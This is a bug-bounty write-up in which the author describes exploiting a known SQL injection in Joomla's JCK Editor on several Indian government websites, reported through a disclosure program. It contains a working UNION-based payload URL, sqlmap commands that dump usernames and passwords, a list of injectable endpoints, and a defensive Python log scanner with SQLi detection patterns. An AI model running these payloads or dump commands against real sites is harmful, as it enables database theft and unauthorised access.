How I Found Critical Bugs :: SQL Injection → Compromised 10+ Govt. website’s Whole Databases !!


Professor0xx01

Hello Hunters…….!!!! Hope you all are doing well..!!

Intro: I am p_ra_dee_p, whom you all know as Professor0xx01. Today I am going to explain my story about finding SQL Injection bugs in multiple websites belonging to our Indian Government. It’s going to be a much more interesting story compared to all the other stories. So, let’s jump into it.

Bug CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

What is SQLi?

SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. This can allow an attacker to view data that they are not normally able to retrieve. This might include data that belongs to other users, or any other data that the application can access.

[Image: SQLi]

In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.

First Bug :: SQL Injection (CVE-2018-17254)

During the assessment of a vulnerability disclosure program under NCIIPC, I found a URL which belonged to the “********** ******** ******** Agency”, India. Sorry, it’s not disclosable publicly 🙂🙂!!

Note: I had already collected *.gov.in domains during my subdomain enumeration phase.

After a little bit of enumeration, I found a juicy endpoint of the JCK Editor component 6.4.4.

Critical (9.8): The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php ‘parent’ parameter.

The bug: “Joomla JCK Editor 6.4.4 — ‘parent’ SQL Injection”.

Seeing this, I instantly went to the browser and browsed the URL with the payload from the CVE. After browsing, as expected….., it worked!! I got the output of database(), user() and version() …….!!!!

https://<target>.com/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa
[Screenshot: browsed result]

Then I went through the CVE PoCs available on the internet, but they did not work properly. They threw an error whenever I executed the code.

Then I thought……………………

But after that, I remembered that the tool “SQLMAP” exists, which might be able to do this job. So I copied the URL and started my other pet, “Sqlmap”, against the vulnerable parameter “parent” which I had identified earlier in the CVE details.

sqlmap -u "https://<target.com>/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=1" --batch -p parent --level 4 --risk 3 --dbs
[Screenshot: sqlmap]

Anddddddd……!!! As you can see here, I dumped all the available databases on the target system.

I got a total of 10 databases from the target system.

[Screenshot: extracted databases]

Now it was time to extract data from the available databases. I successfully dumped a lot of sensitive data, like “username”, “password”, “email”, “name”, “otpKey” etc., from the MySQL databases, as you can see in the attached screenshot below…………….!!

sqlmap -u "https://<target.com>/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=1" -p parent --batch --level 4 --risk 3 -D <database_name> -T <table_name> -C id,username,password,name --dump
[Screenshot: dump — username, password]

Second Bug :: SQL Injection — Same as the previous one, but on another domain.

While hunting further on other websites, I detected this same bug by following the same technique I have already described….!!!

https://<target2>.com/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5(999999999)),NULL,NULL,NULL,NULL,NULL--%20aa

I browsed it and got the same type of information as with the previous one.

[Screenshot: browsed URL]

Sooooo,,, why waste time….??????? (it was 02:39 a.m. when I found it)

I handed it over to “sqlmap” and it extracted the available databases and the corresponding data successfully. Here I also got the super user’s username as well as the password from the data tables.

sqlmap -u "https://<target2.com>/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=1" -p parent --batch --level 4 --risk 3 -D <database_name> -T <table_name> -C id,username,password,name --dump
[Screenshot: dumped — username, password, name, id]

Third One :: SQL Injection — Same as the previous two, but on another domain.

I browsed it and got the same type of information as with the previous two.

Sooooo,,, after getting it, I handed this one to Sqlmap as well, and it extracted the available databases and the corresponding data successfully. Here I also got the super user’s username, a test username, the emails of these accounts, as well as the passwords from the data tables.

The next day I started again and compromised the databases of another 8+ websites within a few hours, and my job was done.

Then I wrote up instant reports about my findings of these CRITICAL severity issues and sent them to the NCIIPC team.

They appreciated my work and acknowledged me for my findings!!

Discovered Endpoints For SQLi:

1. https://<target>.in/plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=**<sql payload here>**

2. https://<target>.in/index.php?option=com_contenthistory&view=history&list[ordering]&item_id=1&type_id=1&list[select]=**<sql payload here>**

3. https://<target>.in/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=**<sql payload here>**
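As an added example that is not part of the original write-up, here is a small Python check a site owner could run over web server access logs to spot the three endpoint/parameter pairs listed above (the links.php ‘parent’ parameter from the first bug, plus the com_contenthistory and com_fields list parameters) carrying the kind of UNION / CONCAT_WS payload shown earlier, or requests sent with sqlmap’s default User-Agent. The log lines, IPs and timestamps are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint suffix, Joomla component (None = any) and parameter, as listed in the write-up.
WATCHED = [
    ("plugins/jtreelink/dialogs/links.php", None, "parent"),
    ("index.php", "com_contenthistory", "list[select]"),
    ("index.php", "com_fields", "list[fullordering]"),
]

# Fragments typical of the UNION-based payloads above; parse_qs already percent-decodes values.
SQLI_RE = re.compile(
    r"(union\s+(all\s+)?select|concat_ws\s*\(|\b(user|database|version)\s*\(\s*\)|--\s|['\"]\s*(or|and)\b)",
    re.IGNORECASE,
)
# Apache/nginx "combined" log format: ip ident user [ts] "METHOD target PROTO" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample log lines (not real traffic): a payload hit, a plain sqlmap probe,
# a benign ordering value, a payload in list[select] that errored, and unrelated traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:02:39:11 +0530] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1" 200 2211 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:02:40:02 +0530] "GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=1 HTTP/1.1" 200 1830 "-" "sqlmap/1.7"',
    '198.51.100.9 - - [10/Oct/2023:02:41:30 +0530] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=a.id%20ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Oct/2023:02:42:07 +0530] "GET /index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[select]=1%20UNION%20SELECT%201 HTTP/1.1" 500 412 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [10/Oct/2023:02:43:00 +0530] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 9910 "-" "Mozilla/5.0"',
]

def inspect_line(line):
    """Return a finding dict for a suspicious request, or None for lines that look benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    qs = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    if "sqlmap" in m.group("ua").lower():          # sqlmap's default User-Agent names itself
        reasons.append("sqlmap user-agent")
    option = qs.get("option", [""])[0]
    for suffix, component, param in WATCHED:
        if not parts.path.endswith(suffix) or (component and option != component):
            continue
        if any(SQLI_RE.search(value) for value in qs.get(param, [])):
            reasons.append(f"sqli pattern in {param}")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "path": parts.path, "status": m.group("status"), "reasons": reasons}

def scan(lines):
    """Scan an iterable of combined-format log lines and return the list of findings."""
    return [hit for hit in map(inspect_line, lines) if hit]
```

Patching JCK Editor (and Joomla core for the two index.php endpoints) is the real fix; this check only helps find who already probed the endpoints.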

That’s it for this article now :) !! Hope you guys all enjoyed it..!!

If you like it, don’t forget to clap & follow me for more insightful articles ..!! 😊🎖️

THANKS FOR READING !!

Happy Hunting ~~

Keep learning & keep securing ~~
